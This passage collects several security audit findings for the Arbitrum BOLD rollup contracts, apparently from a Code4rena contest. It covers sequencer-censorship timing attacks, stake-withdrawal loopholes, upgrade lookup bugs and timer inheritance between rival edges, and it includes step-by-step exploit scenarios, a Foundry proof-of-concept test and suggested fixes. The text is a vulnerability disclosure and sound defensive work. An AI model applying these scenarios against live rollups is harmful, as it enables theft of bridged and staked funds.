  • For each level, multiple interactions are needed, and each can only be made after the opponent's move: createLayerZeroEdge to dispute the claim, then several bisectEdge calls. Crucially, the bisectEdge calls happen in turns, because each bisected edge has to be "rivaled" before being further bisected, until an edge of length one is reached for that level. Thus the honest challenger cannot fully bisect their claim ahead of time (in a single L1 "move"); they must take turns with the attacker, since each response has to target the attacker's last move. However, while the attacker experiences no delay, every honest move is delayed by having to go through L1 and the long force inclusion delay.

  • Because all progress is made by taking turns bisecting a 2^43 space of disagreements, it's easy to see that the number of turns is around 43 turn-based moves (each bisection halves the space). Adding the createLayerZeroEdge calls for each level and the final call to confirmEdgeByOneStepProof brings the total to up to 50 turn-based actions.

  • For example, for the smaller config used in the tests (3 intermediate levels and 6 bisections in each level), 31 turn-by-turn moves are made by each opponent.

  • Clearly, 50 moves (or even the test config's 31 moves), each delayed by up to 24 hours, very quickly cause the honest challengers to "time out" and exhaust their 7-day clock (counted from the time of the first move).
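
The arithmetic above can be sketched in a few lines (the level counts and delay figures are the submission's assumptions, not protocol constants):

```python
# Back-of-the-envelope model of the turn-based dispute delay described above.
# Numbers mirror the submission's assumptions: a 2^43 disagreement space,
# 6 levels plus the final one-step proof, and a per-turn force inclusion delay.

BISECTIONS = 43   # log2 of the disagreement space: one turn per bisection
LEVELS = 6        # block level + 4 intermediate levels + SmallStep level
EXTRA_CALLS = 1   # the final confirmEdgeByOneStepProof call

def honest_turns() -> int:
    # one createLayerZeroEdge per level, plus the bisections, plus the OSP call
    return BISECTIONS + LEVELS + EXTRA_CALLS

def clock_lost_hours(delay_hours_per_turn: float) -> float:
    # every honest move can be delayed by the force inclusion window,
    # during which the attacker's edge accumulates "unrivaled" time
    return honest_turns() * delay_hours_per_turn

CHESS_CLOCK_HOURS = 7 * 24

print(honest_turns())                            # 50 turn-based actions
print(clock_lost_hours(24) > CHESS_CLOCK_HOURS)  # True: 24h delay exhausts the clock
print(clock_lost_hours(4) > CHESS_CLOCK_HOURS)   # True: even a 4h delay exhausts it
```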

Here's a step-by-step scenario for the attack described in the submission:

  1. An L3 chain, called OrbitChain using the BOLD dispute protocol is deployed on Arbitrum (L2).
  2. A malicious L2 (Arbitrum) sequencer operator decides to use its temporary sequencing censorship privileges to create an invalid assertion for the L3 chain.
  3. The attacker submits the invalid assertion to the L2 Rollup chain as an assertion - newStakeOnNewAssertion.
  4. Honest L3 validators recognize the assertion as invalid and attempt to initiate a dispute by calling createLayerZeroEdge to challenge the claim.
  5. The malicious L2 sequencer censors the honest validators' L2 transactions, forcing them to use the L1 force inclusion mechanism to include their transactions on L2. The transactions are included with a significant delay due to the design of the force inclusion delay mechanism. During the delay, the attacker's edge is unrivaled and gains "unrivaled" time.
  6. The attacker responds to the honest validators' dispute without any delay, as their transactions are not censored by the sequencer.
  7. For each level of the dispute (block level, intermediate levels, and SmallStep level), the honest validators and the attacker take turns calling bisectEdge to narrow down the disagreement space.
  8. Due to the L1 force inclusion delay of up to 24 hours per turn, the honest validators' moves are significantly delayed, while the attacker can respond immediately. During the delay, the attacker's edge is unrivaled and gains "unrivaled" time.
  9. As the dispute progresses through the levels, requiring around 50 turn-based steps, the accumulated delays from the L1 force inclusion mechanism exhaust the honest validators' 7-day chess clock, allowing the attacker to accumulate 7 days of "unrivaled" time.
  10. The honest validators are unable to complete the dispute within the time limit, allowing the attacker's invalid assertion to be confirmed.
  11. The attacker calls confirmEdgeByTime to finish the dispute, and calls confirmAssertion to prove its assertion.
  12. As a result, the invalid assertion is confirmed and added as a root into the outbox, enabling the attacker to submit arbitrary withdrawals and drain funds from the L3 chain.

Tools Used

Manual review.

Recommended Mitigation Steps

The chess clock and the force inclusion delay are inherently incompatible with such a long turn-based game when played on L2. In its current highly interactive form, the application of BOLD should be limited to deployments on L1 (for validating L2s) only, and not used for L3s.

Alternatively, two improvements can be made to make the attack less impactful:

  1. Reduce the number of turns to a very small number. This can be done by having each move post all of the data required to challenge any of its components. For example, the levels can be divided into 4 levels such that each level has 2^11 sub-levels (sub-edges), and a createLayerZeroEdge call contains all 2^11 sub-levels (how this can be possible is detailed below). This way there are only 2 "turns":
    1. Attacker: createLayerZeroEdge on first level (e.g., level 1) with 2048 sub-levels already detailed on-chain.
    2. Defender: challenge the specific sub-level (already on level 2) via createLayerZeroEdge on the second level, with all 2048 sub-levels included on-chain.
    3. Attacker: level 3, with all data required for level 4 counter.
    4. Defender: level 4, with all specific instructions.
    5. Attacker: invoke OSP and settle dispute, or wait to lose on time.
  2. Reduce the force inclusion delay to a smaller duration, for example 6 hours.

The combination of these two factors reduces the number of turn-based moves the challenger (defender) needs to make to only 2. If each of those moves is delayed by 6 hours of force inclusion delay, only 12 hours of the 7-day clock are lost to the attack, allowing the dispute to proceed with manageable impact.

Posting the required sub-level data would make each transaction more expensive, but it also reduces the overall number of transactions and the complexity. Additionally, on L1, data blobs can be used to make this cheaper. On L2, calldata will be used, which is itself posted to L1 blobs, which also keeps the costs manageable.

In order to commit to this data on-chain, instead of storing the full data, a merkle root can be computed on-chain from the input data and stored. Although merkleizing 2048 elements on-chain would be expensive, it is manageable (roughly 4096 hashes), costing around 200K gas. Any subsequent player would then be able to construct a proof for any element of the tree from the previously posted data.
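
The hash-count estimate can be checked with a small script (SHA-256 stands in for keccak, and the element encoding is illustrative):

```python
# Rough count of the hashing work to merkleize 2048 posted sub-level elements,
# supporting the ~4096-hash estimate above: 2048 leaf hashes plus 2047
# internal-node hashes. Gas figures are not modeled here.

import hashlib

def merkle_root(leaves: list[bytes]) -> tuple[bytes, int]:
    """Return (root, number_of_hash_operations) for a power-of-two leaf set."""
    hashes = 0
    level = []
    for leaf in leaves:  # hash each raw element into a leaf
        level.append(hashlib.sha256(leaf).digest())
        hashes += 1
    while len(level) > 1:  # combine pairwise up the tree
        level = [hashlib.sha256(level[i] + level[i + 1]).digest()
                 for i in range(0, len(level), 2)]
        hashes += len(level)
    return level[0], hashes

root, ops = merkle_root([i.to_bytes(32, "big") for i in range(2048)])
print(ops)  # 4095 hash operations, i.e. "roughly 4096 hashes"
```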

Assessed type

Other

Upgrades to EdgeChallengeManager could temporarily DoS the assertion chain until the admin unsticks it by force-confirming an assertion

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupUserLogic.sol#L115-L128

Vulnerability details

Description

EdgeChallengeManager (a.k.a. ECM) can be upgraded during the life cycle of a rollup and this is officialized by an Admin calling RollupAdminLogic::setChallengeManager.

Let's say we have the following assertion chain setup: 3 assertions successfully confirmed, and then at the 4th we have a divergence, where only the assertion winning the challenge will be able to be confirmed.

                  /--- D(ECM1) - bad
     A --- B --- C    
     |     |     |\--- E(ECM2) - winner (edge confirmed)
    ECM1  ECM1  ECM1 

The problem arises with the following code from RollupUserLogic::confirmAssertion. The implementation assumes that the ECM instance used to retrieve the winningEdge information is the same as the one for the previous assertion, but as the setup above shows, that is not guaranteed. So while assertion E is indeed the winner (its edge is confirmed, but in the ECM2 instance, not ECM1), the code here will not find the edge information and will always revert, so the assertion chain will be stuck. The team can resolve the problem by pausing the rollup and calling RollupAdminLogic::forceConfirmAssertion. This seems unexpected and appears to warrant Medium severity.

        if (prevAssertion.secondChildBlock > 0) {
            // if the prev has more than 1 child, check if this assertion is the challenge winner
            ChallengeEdge memory winningEdge = IEdgeChallengeManager(prevConfig.challengeManager).getEdge(winningEdgeId);     //<----- THIS: reading the ECM from prevConfig
            require(winningEdge.claimId == assertionHash, "NOT_WINNER");
            require(winningEdge.status == EdgeStatus.Confirmed, "EDGE_NOT_CONFIRMED");
            require(winningEdge.confirmedAtBlock != 0, "ZERO_CONFIRMED_AT_BLOCK");
            // an additional number of blocks is added to ensure that the result of the challenge is widely
            // observable before it causes an assertion to be confirmed. After a winning edge is found, it will
            // always be challengeGracePeriodBlocks before an assertion can be confirmed
            require(
                block.number >= winningEdge.confirmedAtBlock + challengeGracePeriodBlocks,
                "CHALLENGE_GRACE_PERIOD_NOT_PASSED"
            );
        }

Impacts

Assertion chain temporarily stuck if an assertion divergence arise while an ECM upgrade had just happened and the winner is against the new ECM instance (while the previous assertion is against the old ECM instance)

Proof of Concept

I will demonstrate the setup described initially. We have 3 actors in play: the Admin, an Honest validator, and an Evil validator.

  1. Admin deploys the Rollup and ECM contracts. Everything runs smoothly for days.
  2. Evil validator submits assertion D.
  3. Admin decides to upgrade the contract to change the staking requirement, which requires a full upgrade and a call to setChallengeManager.
  4. Honest validator submits assertion E.
  5. Both assertions D and E are challenged; E wins the battle and its edge is confirmed (in the new ECM instance).
  6. Honest validator calls confirmAssertion, but that will revert at require(winningEdge.claimId == assertionHash, "NOT_WINNER");, as the winning edge will not be found in the previous ECM's storage.
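
The broken lookup can be modeled in a few lines of Python (edge ids, the empty-struct behavior of getEdge, and the fallback are simplified stand-ins for the Solidity code):

```python
# Minimal model of the ECM upgrade lookup mismatch. getEdge on the old ECM
# returns an empty (zeroed) edge for an unknown id, mirroring Solidity's
# default struct value, so the NOT_WINNER check fails even for the real winner.

EMPTY = {"claim_id": b"\x00" * 32, "status": "None"}

class ECM:
    def __init__(self):
        self.edges = {}
    def get_edge(self, edge_id):
        return self.edges.get(edge_id, EMPTY)

ecm1, ecm2 = ECM(), ECM()  # old and upgraded challenge managers
winning_id = b"winning-edge"
assertion_e = b"assertion-E"
ecm2.edges[winning_id] = {"claim_id": assertion_e, "status": "Confirmed"}

# confirmAssertion reads the ECM recorded for the *previous* assertion (ecm1):
edge = ecm1.get_edge(winning_id)
print(edge["claim_id"] == assertion_e)  # False -> reverts with NOT_WINNER

# a fallback to the current ECM recovers the confirmed winning edge:
if edge["claim_id"] == b"\x00" * 32:
    edge = ecm2.get_edge(winning_id)
print(edge["claim_id"] == assertion_e)  # True
```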

Recommended Mitigation Steps

Add a fallback to the current ECM in case the edge is not found from the previous assertion ECM.

        if (prevAssertion.secondChildBlock > 0) {
            // if the prev has more than 1 child, check if this assertion is the challenge winner
            ChallengeEdge memory winningEdge = IEdgeChallengeManager(prevConfig.challengeManager).getEdge(winningEdgeId);
+           if (winningEdge.claimId == bytes32(0)) {
+               winningEdge = challengeManager.getEdge(winningEdgeId);
+           }
            require(winningEdge.claimId == assertionHash, "NOT_WINNER");
            require(winningEdge.status == EdgeStatus.Confirmed, "EDGE_NOT_CONFIRMED");
            require(winningEdge.confirmedAtBlock != 0, "ZERO_CONFIRMED_AT_BLOCK");
            // an additional number of blocks is added to ensure that the result of the challenge is widely
            // observable before it causes an assertion to be confirmed. After a winning edge is found, it will
            // always be challengeGracePeriodBlocks before an assertion can be confirmed
            require(
                block.number >= winningEdge.confirmedAtBlock + challengeGracePeriodBlocks,
                "CHALLENGE_GRACE_PERIOD_NOT_PASSED"
            );
        }

Assessed type

Upgradable

The time spent paused is incremented in the rollup's timing for assertion validation

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/RollupAdminLogic.sol#L145
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/RollupUserLogic.sol#L110

Vulnerability details

Impact

    /**
     * @notice Pause interaction with the rollup contract.
     * The time spent paused is not incremented in the rollup's timing for assertion validation.
     * @dev this function may be frontrun by a validator (ie to create a assertion before the system is paused).
     * The pause should be called atomically with required checks to be sure the system is paused in a consistent state.
     * The RollupAdmin may execute a check against the Rollup's latest assertion num or the OldChallengeManager, then execute this function atomically with it.
     */
    function pause() external override {
        _pause();
        emit OwnerFunctionCalled(3);
    }

According to the comment, the time spent paused should not be incremented in the rollup's timing for assertion validation. However, in reality the rollup's timing does not take paused time into consideration. As a result, an adversary can censor transactions (within the censorship budget) and force an incorrect assertion to be confirmed.

Proof of Concept

According to the contest doc

We assume that an adversary can censor transactions for at most 1 challengePeriodBlocks or confirmPeriodBlock (whichever is smaller)

Suppose challengePeriodBlocks and confirmPeriodBlock are both 7 days. The steps are as following:

  1. Adversary makes an invalid assertion on top of the latest confirmed assertion, and censors all other txs that submit assertions for 2 days (Day 0 - Day 1).
  2. Admin pauses the rollup for 2 days to counteract the situation (Day 2 - Day 3).
  3. Admin realizes pausing doesn't help, and unpauses.
  4. Adversary continues to censor all txs that submit assertions for 4 days (Day 4 - Day 7).
  5. Adversary confirms the incorrect assertion.

Since no one can make new assertions when the contract is paused, the adversary only needs to spend 6 days of censorship budget (to confirm an incorrect assertion) in this case.

    require(block.number >= assertion.createdAtBlock + prevConfig.confirmPeriodBlocks, "BEFORE_DEADLINE");

As this line shows, no special care is taken for paused time.
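
The budget accounting can be modeled as follows (the blocks-per-day figure and the day spans are illustrative assumptions from the scenario above):

```python
# Model of the censorship-budget accounting described above. The deadline
# check compares raw block numbers, so blocks that pass while the rollup is
# paused still count toward confirmPeriodBlocks.

BLOCKS_PER_DAY = 7200                 # assumed blocks per day
CONFIRM_PERIOD = 7 * BLOCKS_PER_DAY   # 7-day confirm period

created_at = 0
censored = 6 * BLOCKS_PER_DAY         # days 0-1 and days 4-7
paused = 2 * BLOCKS_PER_DAY           # days 2-3: nobody can post assertions

now = created_at + censored + paused  # 8 days of block numbers have elapsed

# current check: paused blocks count toward the deadline
deadline_passed = now >= created_at + CONFIRM_PERIOD
print(deadline_passed)                # True: confirmable with only 6 days censored

# suggested accounting: exclude paused blocks from the rollup's timing
deadline_passed_fixed = (now - paused) >= created_at + CONFIRM_PERIOD
print(deadline_passed_fixed)          # False: the full 7-day budget is still required
```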

Tools Used

Manual

Recommended Mitigation Steps

Make sure the time spent paused is not incremented in the rollup's timing for assertion validation.

Assessed type

Context

Remaining stakers are not refunded

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/BOLDUpgradeAction.sol#L344-L359

Vulnerability details

Impact

Although it is stated that no more than 50 stakers are expected, this remains a projection. If there are ever more than 50 stakers, the stakers beyond the first 50 would be left on the older rollup, and their funds would be permanently stuck in the old rollup contract.

Proof of Concept

        uint64 stakerCount = ROLLUP_READER.stakerCount();
        // since we for-loop these stakers we set an arbitrary limit - we dont
        // expect any instances to have close to this number of stakers
        if (stakerCount > 50) {
            stakerCount = 50;
        }

        for (uint64 i = 0; i < stakerCount; i++) {
            address stakerAddr = ROLLUP_READER.getStakerAddress(i);

            OldStaker memory staker = ROLLUP_READER.getStaker(stakerAddr);
            if (staker.isStaked && staker.currentChallenge == 0) {
                address[] memory stakersToRefund = new address[](1);
                stakersToRefund[0] = stakerAddr;

                IOldRollupAdmin(address(OLD_ROLLUP)).forceRefundStaker(stakersToRefund);
            }
        }

Tools Used

Manual Review, Josephdara

Recommended Mitigation Steps

Implement a function to complete refunds, or transfer the ownership of the old rollup contract to a new address after upgrade to allow for manual forceRefund calls.
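
The paginated-refund idea can be sketched as follows (function and variable names are hypothetical, not part of the contract):

```python
# Sketch of processing refunds in bounded batches across multiple calls,
# instead of silently capping at an arbitrary limit of 50 and stranding the
# rest. Each loop iteration stands in for one on-chain call with a bounded
# amount of work.

def refund_in_batches(stakers: list[str], batch_size: int = 50) -> list[str]:
    refunded = []
    cursor = 0
    while cursor < len(stakers):                     # one "call" per iteration
        batch = stakers[cursor:cursor + batch_size]  # bounded loop per call
        refunded.extend(batch)
        cursor += len(batch)
    return refunded

stakers = [f"staker-{i}" for i in range(137)]        # more than the 50 cap
print(len(refund_in_batches(stakers)))               # 137: nobody left behind
```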

Assessed type

Other

QA Report

See the markdown file with the details of this report here.

Lack of input validation in the edge staking pool allows a malicious user to create a pool for a clearly invalid edge, making stakers lose funds

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/assertionStakingPool/EdgeStakingPool.sol#L44

Vulnerability details

Impact

Lack of input validation in the edge staking pool allows a malicious user to create a pool for a clearly invalid edge, making stakers lose funds.

Proof of Concept

Anyone can create an edge pool with an arbitrary edge id:

  constructor(
        address _challengeManager,
        bytes32 _edgeId
    ) AbsBoldStakingPool(address(EdgeChallengeManager(_challengeManager).stakeToken())) {
        challengeManager = _challengeManager;
        edgeId = _edgeId;
    }

Then, once enough users have staked funds, an edge can be created:

 function createEdge(CreateEdgeArgs calldata args) external {
        uint256 requiredStake = EdgeChallengeManager(challengeManager).stakeAmounts(args.level);
        IERC20(stakeToken).safeIncreaseAllowance(address(challengeManager), requiredStake);
        bytes32 newEdgeId = EdgeChallengeManager(challengeManager).createLayerZeroEdge(args);
        if (newEdgeId != edgeId) {
            revert IncorrectEdgeId(newEdgeId, edgeId);
        }
    }

The function takes arbitrary CreateEdgeArgs input:

/// @notice Data for creating a layer zero edge
struct CreateEdgeArgs {
    /// @notice The level of edge to be created. Challenges are decomposed into multiple levels.
    ///         The first (level 0) being of type Block, followed by n (set by NUM_BIGSTEP_LEVEL) levels of type BigStep, and finally
    ///         followed by a single level of type SmallStep. Each level is bisected until an edge
    ///         of length one is reached before proceeding to the next level. The first edge in each level (the layer zero edge)
    ///         makes a claim about an assertion or assertion in the lower level.
    ///         Finally in the last level, a SmallStep edge is added that claims a lower level length one BigStep edge, and these
    ///         SmallStep edges are bisected until they reach length one. A length one small step edge
    ///         can then be directly executed using a one-step proof.
    uint8 level;
    /// @notice The end history root of the edge to be created
    bytes32 endHistoryRoot;
    /// @notice The end height of the edge to be created.
    /// @dev    End height is deterministic for different levels but supplying it here gives the
    ///         caller a bit of extra security that they are supplying data for the correct level of edge
    uint256 endHeight;
    /// @notice The edge, or assertion, that is being claimed correct by the newly created edge.
    bytes32 claimId;
    /// @notice Proof that the start history root commits to a prefix of the states that
    ///         end history root commits to
    bytes prefixProof;
    /// @notice Edge type specific data
    ///         For Block type edges this is the abi encoding of:
    ///         bytes32[]: Inclusion proof - proof to show that the end state is the last state in the end history root
    ///         AssertionStateData: the before state of the edge
    ///         AssertionStateData: the after state of the edge
    ///         bytes32 predecessorId: id of the prev assertion
    ///         bytes32 inboxAcc:  the inbox accumulator of the assertion
    ///         For BigStep and SmallStep edges this is the abi encoding of:
    ///         bytes32: Start state - first state the edge commits to
    ///         bytes32: End state - last state the edge commits to
    ///         bytes32[]: Claim start inclusion proof - proof to show the start state is the first state in the claim edge
    ///         bytes32[]: Claim end inclusion proof - proof to show the end state is the last state in the claim edge
    ///         bytes32[]: Inclusion proof - proof to show that the end state is the last state in the end history root
    bytes proof;
}

There is a lack of input validation: when creating a layer zero edge, the claimId parameter is not sufficiently validated:

  function createLayerZeroEdge(
        EdgeStore storage store,
        CreateEdgeArgs calldata args,
        AssertionReferenceData memory ard,
        IOneStepProofEntry oneStepProofEntry,
        uint256 expectedEndHeight,
        uint8 numBigStepLevel,
        bool whitelistEnabled
    ) internal returns (EdgeAddedData memory) {
        // each edge type requires some specific checks
        (ProofData memory proofData, bytes32 originId) =
            layerZeroTypeSpecificChecks(store, args, ard, oneStepProofEntry, numBigStepLevel);
        // all edge types share some common checks
        (bytes32 startHistoryRoot) = layerZeroCommonChecks(proofData, args, expectedEndHeight);
        // we only wrap the struct creation in a function as doing so with exceeds the stack limit
        ChallengeEdge memory ce = toLayerZeroEdge(originId, startHistoryRoot, args);

this is calling:

layerZeroTypeSpecificChecks

Basically, if the levelToType is EdgeType.Block, the claimId must reference an assertion that is pending and has a sibling:

// if the assertion is already confirmed or rejected then it cant be referenced as a claim
if (!ard.isPending) {
    revert AssertionNotPending();
}

// if the claim doesnt have a sibling then it is undisputed, there's no need
// to open challenge edges for it
if (!ard.hasSibling) {
    revert AssertionNoSibling();
}

If a user knows that a pending assertion will be rejected, they can use that assertion to create an edge, ensuring the edge will not be confirmed either.

If the levelToType is not EdgeType.Block, the code requires that the claimEdge is in pending status as well:

// hasLengthOneRival checks existance, so we can use getNoCheck
ChallengeEdge storage claimEdge = getNoCheck(store, args.claimId);

// origin id is the mutual id of the claim
// all rivals and their children share the same origin id - it is a link to the information
// they agree on
bytes32 originId = claimEdge.mutualId();

// once a claim is confirmed it's status can never become pending again, so there is no point
// opening a challenge that references it
if (claimEdge.status != EdgeStatus.Pending) {
    revert ClaimEdgeNotPending();
}

An invalid pending edge will never be confirmed, so if a user knows that the running edge will be rejected, they can use that edge's id (as the claimId) to create an edge that likewise can never be confirmed.

Tools Used

Manual Review

Recommended Mitigation Steps

Add access control to the createEdge function.

Alternatively, when the edge staking pool is deployed, set the full parameter in the constructor:

CreateEdgeArgs calldata args

so that stakers can research and verify that the args are valid before staking funds.
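
The constructor-commitment idea can be modeled as follows (the hashing scheme and names are illustrative stand-ins for an abi.encode/keccak commitment in the Solidity pool):

```python
# Model of the second mitigation: commit to the full CreateEdgeArgs at pool
# deployment (here via a hash) so that stakers can inspect the exact edge the
# pool will create before depositing.

import hashlib, json

def commit(args: dict) -> bytes:
    return hashlib.sha256(json.dumps(args, sort_keys=True).encode()).digest()

class EdgeStakingPool:
    def __init__(self, args_commitment: bytes):
        self.args_commitment = args_commitment  # fixed at deployment

    def create_edge(self, args: dict) -> str:
        # reject any args that differ from what stakers signed up for
        if commit(args) != self.args_commitment:
            raise ValueError("IncorrectEdgeArgs")
        return "edge-created"

good_args = {"level": 0, "endHeight": 2**43, "claimId": "0xabc"}
pool = EdgeStakingPool(commit(good_args))
print(pool.create_edge(good_args))            # edge-created
bad_args = dict(good_args, claimId="0xdead")  # doomed claim swapped in
try:
    pool.create_edge(bad_args)
except ValueError as e:
    print(e)                                  # IncorrectEdgeArgs
```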

Assessed type

Invalid Validation

A malicious validator can avoid losing their stake when making bad assertions

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/RollupCore.sol#L572

Vulnerability details

A validator can unstake if their latest staked assertion is the latest confirmed assertion (see the first arrow below) or if their assertion already has a first child (see the second arrow below):

function requireInactiveStaker(address stakerAddress) internal view {
        require(isStaked(stakerAddress), "NOT_STAKED");
        // A staker is inactive if
        // a) their last staked assertion is the latest confirmed assertion
        // b) their last staked assertion have a child
        bytes32 lastestAssertion = latestStakedAssertion(stakerAddress);
        bool isLatestConfirmed = lastestAssertion == latestConfirmed(); <----
        bool haveChild = getAssertionStorage(lastestAssertion).firstChildBlock > 0; <----
        require(isLatestConfirmed || haveChild, "STAKE_ACTIVE");
    }

[Link]

Another point needed to understand the vulnerability is that validators can create a new assertion whose parent assertion is not yet confirmed (a parent is a past assertion). With that said, an attacker can control 2 validators and perform the following steps:

  1. Stake on a bad assertion with validator 1 (by calling newStakeOnNewAssertion).
  2. Stake on a new assertion whose parent is the assertion created in step 1, with validator 2.
  3. With validator 1, call returnOldDeposit; since validator 1's assertion already has a child, the withdrawal succeeds.
  4. With validator 1, create an assertion whose parent is the assertion from step 2.
  5. At this point validator 2 can call returnOldDeposit and withdraw their stake.

An attacker can keep doing this indefinitely, leading to several problems:

  function stakeOnNewAssertion(AssertionInputs calldata assertion, bytes32 expectedAssertionHash)
        public
        onlyValidator
        whenNotPaused
    {
        ...

        if (!getAssertionStorage(newAssertionHash).isFirstChild) {
            // We assume assertion.beforeStateData is valid here as it will be validated in createNewAssertion
            // only 1 of the children can be confirmed and get their stake refunded
            // so we send the other children's stake to the loserStakeEscrow
            // NOTE: if the losing staker have staked more than requiredStake, the excess stake will be stuck
            IERC20(stakeToken).safeTransfer(loserStakeEscrow, assertion.beforeStateData.configData.requiredStake); <------
        }
    }

[Link]

Each time such an assertion is created, an amount equal to requiredStake is sent to the loserStakeEscrow, progressively draining the rollup contract's funds.
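
The drain can be simulated with simplified bookkeeping (amounts and the initial balance are illustrative):

```python
# Simulation of the two-validator "leapfrog" described above. Every new
# non-first-child assertion forwards requiredStake from the rollup contract to
# the loserStakeEscrow, yet the previous staker can still withdraw via
# returnOldDeposit, so the contract loses requiredStake per cycle.

REQUIRED_STAKE = 100

def cycle(balance: int) -> int:
    balance += REQUIRED_STAKE  # attacker validator stakes on a new child
    balance -= REQUIRED_STAKE  # non-first child: stake forwarded to loserStakeEscrow
    balance -= REQUIRED_STAKE  # other attacker validator calls returnOldDeposit
    return balance             # net -100 per cycle

rollup_balance = 500           # assumed deposits backing honest validators
for _ in range(5):
    rollup_balance = cycle(rollup_balance)

print(rollup_balance)          # 0: honest validators can no longer withdraw
```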

Impact

This vulnerability has several impacts:

  1. The rollup contract can be drained. (Even if there is a way to recover the funds from the loserStakeEscrow, it remains a problem, since an attacker can use this to DoS withdrawals for honest validators.)
  2. A malicious validator cannot be slashed (though they cannot withdraw either).
  3. Honest validators have to do more work, and the malicious validator is never actually punished.

Proof of Concept

Run the following proof of concept in test/Rollup.t.sol:

function testSuccessCreateSecondAssertionUnstake() public {
        (bytes32 prevHash, AssertionState memory beforeState, uint64 prevInboxCount) = testSuccessCreateAssertion(); // create first assertion validator 1

        AssertionState memory afterState; // set up second assertion
        afterState.machineStatus = MachineStatus.FINISHED;
        afterState.globalState.u64Vals[0] = prevInboxCount;
        bytes32 inboxAcc = userRollup.bridge().sequencerInboxAccs(1); // 1 because we moved the position within message
        bytes32 expectedAssertionHash2 =
            RollupLib.assertionHash({parentAssertionHash: prevHash, afterState: afterState, inboxAcc: inboxAcc});
        bytes32 prevInboxAcc = userRollup.bridge().sequencerInboxAccs(0);
        vm.roll(block.number + 75);
        vm.prank(validator2); // validator 2 make a new assertion 
        userRollup.newStakeOnNewAssertion({
            tokenAmount: BASE_STAKE,
            assertion: AssertionInputs({
                beforeStateData: BeforeStateData({
                    sequencerBatchAcc: prevInboxAcc,
                    prevPrevAssertionHash: genesisHash,
                    configData: ConfigData({
                        wasmModuleRoot: WASM_MODULE_ROOT,
                        requiredStake: BASE_STAKE,
                        challengeManager: address(challengeManager),
                        confirmPeriodBlocks: CONFIRM_PERIOD_BLOCKS,
                        nextInboxPosition: afterState.globalState.u64Vals[0]
                    })
                }),
                beforeState: beforeState,
                afterState: afterState
            }),
            expectedAssertionHash: expectedAssertionHash2,
            withdrawalAddress: validator2Withdrawal
        });

       
        vm.prank(validator1); //validator 1 withdraw
        userRollup.returnOldDeposit();
    }

The point of the proof of concept is to demonstrate that a validator can unstake even when their assertion is not confirmed, as long as it has a child. If the assertion is invalid, they have already unstaked and can trick the protocol as described above.

Tools Used

Manual, foundry

Recommended Mitigation Steps

Consider disallowing validators from withdrawing their stake until their assertion has been confirmed.

Assessed type

Other

Edge from dishonest challenge edge tree can inherit timer from honest tree allowing confirmation of incorrect assertion

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/challengeV2/EdgeChallengeManager.sol#L505-L508
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L520-L531
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L689-L710

Vulnerability details

Impact

Timers can be inherited across different challenge trees and consequently incorrect assertions can be confirmed.

Proof of Concept

The function RollupUserLogic::updateTimerCacheByClaim allows inheritance of timers between different levels of a challenge. It performs some validation in checkClaimIdLink on the edge being inherited from and on the claiming edge.
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L689-L710

    function checkClaimIdLink(EdgeStore storage store, bytes32 edgeId, bytes32 claimingEdgeId, uint8 numBigStepLevel)
        private
        view
    {
        // the origin id of an edge should be the mutual id of the edge in the level below
        if (store.edges[edgeId].mutualId() != store.edges[claimingEdgeId].originId) {
            revert OriginIdMutualIdMismatch(store.edges[edgeId].mutualId(), store.edges[claimingEdgeId].originId);
        }
        // the claiming edge must be exactly one level below
        if (nextEdgeLevel(store.edges[edgeId].level, numBigStepLevel) != store.edges[claimingEdgeId].level) {
            revert EdgeLevelInvalid(
                edgeId,
                claimingEdgeId,
                nextEdgeLevel(store.edges[edgeId].level, numBigStepLevel),
                store.edges[claimingEdgeId].level
            );
        }
    }

As per the comments, the claiming edge must be exactly one level below (ie. in the subchallenge directly after the inheriting edge) and its originId must match the mutualId of the inheriting edge. For clarification, we note that the inheriting edge must be a leaf edge in a challenge/subchallenge tree since the root edges of subchallenges (the layer zero edges) have originId derived from the mutualId of one of these leaf edges, and this originId is inherited by all its children which result from bisection.

Note that rival edges share the same mutualId by definition and since there isn't any extra validation, if a specific edge is a valid inheriting edge, all rivals will also be valid inheriting edges. This means rivals belonging to dishonest challenge edge trees will also be able to inherit from the timer of edges in the honest tree. Consequently, if an honest edge accumulates sufficient unrivalled time for confirmation, a malicious actor can frontrun the confirmation of the honest challenge tree to confirm the dishonest challenge, and in turn an incorrect assertion.

It is sufficient for only one dishonest child edge to inherit a sufficient timer via a claim, since the other will be unrivalled, as challenges between two assertions can only follow one unique bisection path in each challenge tree. The only way to deny this would be to create another assertion that can be bisected to rival the other child and halt its timer accumulation, but this would require losing the assertion and challenge stakes (since only one rival assertion and challenge edge can be confirmed). The timer can then be propagated upwards until we reach the root challenge edge, allowing confirmation.

Even if confirmation of the dishonest root challenge edge is prevented by admin action, confirmation of the layer zero edges of subchallenges would ensure honest validators lose the stake submitted for creating a rival edge (since only one rival edge can be confirmed) and the dishonest validator(s) regain their stake.
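
The rival-acceptance issue can be modeled in a few lines (the id derivation is a simplified stand-in for the Solidity mutualId/originId hashing):

```python
# Model of why checkClaimIdLink accepts rivals: rival edges share a mutualId
# (same origin, level, and start commitment; they differ only in the end
# history root), and the claiming edge's originId is compared against that
# shared mutualId, so a dishonest rival passes the same check.

import hashlib

def h(*parts: str) -> str:
    return hashlib.sha256("|".join(parts).encode()).hexdigest()

def mutual_id(edge: dict) -> str:
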